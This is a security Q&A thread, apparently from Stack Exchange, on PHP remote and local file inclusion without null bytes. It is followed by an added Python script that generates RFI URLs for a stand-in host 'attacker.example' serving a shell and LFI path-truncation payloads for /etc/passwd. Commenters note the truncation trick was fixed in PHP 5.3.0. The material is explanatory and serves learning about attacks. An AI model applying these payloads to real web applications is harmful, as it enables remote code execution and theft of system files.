
Now that null byte injections no longer work on PHP, what are the alternative attack strategies used by attackers for remote file inclusion?

Ray

1 Answer


For RFI you don't need a null byte: simply match the file extension on the remote file, inject a ?, which turns the extension into a query string, use URL rewriting, etc., etc. For LFI, however, you may be able to prepend a number of ././ or /./. to cause the total path to be too long, and PHP will truncate it. This is trickier, as it is length/offset dependent and you will need to brute force the length unless you know the local path; finally, as you are padding by two bytes, you may need an odd or even number of bytes in the filename for the truncation to align.

wireghoul
  • Agreed :) If we limit file downloads by their names, i.e. if the provided file name has readme then allow the download, else don't allow it: can an attacker leverage this to view the source code of download.php? Whatever string the user supplies, it is compared with "readme"; if the string has readme, then go for the download. – Ray May 16 '15 at 14:49
  • Didn't manage to get the total path length trick working (Linux Debian 9); if it was working with previous PHP versions it seems fixed now too, or works only on some environments (Windows maybe?). I can indeed get the path in the log error messages truncated at the correct length, but this affects only the error message display (two messages are generated, each truncating at a different length), and with even longer strings I just end up with HTTP 414 "Request URI too long". – WhiteWinterWolf Nov 02 '17 at 22:23
  • Regarding the LFI trick, this was fixed in PHP 5.3.0. CF: https://security.stackexchange.com/questions/58696/path-truncation-not-working-in-php-while-exploiting-lfi – null Mar 30 '21 at 09:57
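The following is an added example, not code from the question, the answer or the comments above. It models in Python the two tricks the answer describes against a sink of the form `include($_GET['page'] . '.php')`: for RFI, hosting the payload under the expected extension or ending the value with `?` so the appended `.php` lands in the query string; for LFI, padding with `/.` pairs so that the appended suffix falls past a fixed path-length limit, including the odd/even alignment caveat. The sink, the `.php` suffix, the 4096-byte limit (Linux `PATH_MAX`) and the `attacker.example` host are assumptions for illustration only; as the comments note, the truncation behaviour was fixed in PHP 5.3.0 and the simulation stands in for the old engine rather than reproducing it.

```python
"""Model of the RFI/LFI tricks from the answer above (illustrative, not PHP)."""
import posixpath
from urllib.parse import urlsplit

SUFFIX = ".php"      # assumption: vulnerable sink is include($_GET['page'] . '.php')
MAXPATHLEN = 4096    # assumption: Linux PATH_MAX, where pre-5.3.0 PHP cut paths


def build_include_arg(user_value: str) -> str:
    """Models the concatenation the vulnerable include() performs."""
    return user_value + SUFFIX


# --- RFI: make the appended extension harmless ------------------------------

def rfi_extension_match(remote_base: str) -> str:
    """Host the payload under the extension the sink appends.

    remote_base is an attacker URL without extension (assumed host), so the
    sink ends up fetching .../shell.php, which the attacker simply serves."""
    return urlsplit(build_include_arg(remote_base)).path


def rfi_query_trick(remote_url: str) -> dict:
    """End the value with '?' so the appended suffix becomes the query string.

    The remote server ignores the query and serves remote_url's path as-is."""
    parts = urlsplit(build_include_arg(remote_url + "?"))
    return {"fetched_path": parts.path, "query": parts.query}


# --- LFI: path truncation on old PHP ----------------------------------------

def lfi_truncation_payload(target: str, maxlen: int = MAXPATHLEN) -> str:
    """Pad target with '/.' so that the first maxlen bytes of target + SUFFIX
    end on a complete '/.' pair and SUFFIX lies entirely past the limit.

    Each pair is two bytes, so the distance to maxlen must be even; when it
    is odd, the filename is lengthened by one byte with a doubled slash
    (collapsed by POSIX path resolution) to fix the parity."""
    slack = maxlen - len(target)
    if slack < 0:
        raise ValueError("target alone exceeds maxlen")
    if slack % 2:
        target = target.replace("/", "//", 1)
        slack -= 1
    pairs = slack // 2 + 1        # one extra pair pushes SUFFIX beyond maxlen
    return target + "/." * pairs


def simulate_include(user_value: str, maxlen: int = MAXPATHLEN) -> str:
    """Truncate as the old engine did, then normalise like the filesystem."""
    truncated = build_include_arg(user_value)[:maxlen]
    return posixpath.normpath(truncated)


def truncation_aligned(user_value: str, maxlen: int = MAXPATHLEN) -> bool:
    """True when the cut lands after a whole '/.' pair, not on a bare '/'."""
    truncated = build_include_arg(user_value)[:maxlen]
    return not truncated.endswith("/")


if __name__ == "__main__":
    print(rfi_extension_match("http://attacker.example/shell"))
    print(rfi_query_trick("http://attacker.example/shell.txt"))
    good = lfi_truncation_payload("../../../../etc/passwd")
    print(len(good), truncation_aligned(good), simulate_include(good))
    # naive padding of a target whose length has the wrong parity
    naive = "../../../../etc/hosts" + "/." * 2040
    print(truncation_aligned(naive))
```

`truncation_aligned` is the check behind the answer's odd/even remark: with a 21-byte target and 4096-byte limit the cut falls on a bare `/`, and only after lengthening the filename by one byte does it fall on a complete pair. Note that `posixpath.normpath` strips a trailing slash, so the normalised string alone would hide the misalignment; the alignment check has to look at the truncated bytes before normalisation. Brute-forcing the length when the local path is unknown amounts to repeating the padding for each candidate path length until the included file is served.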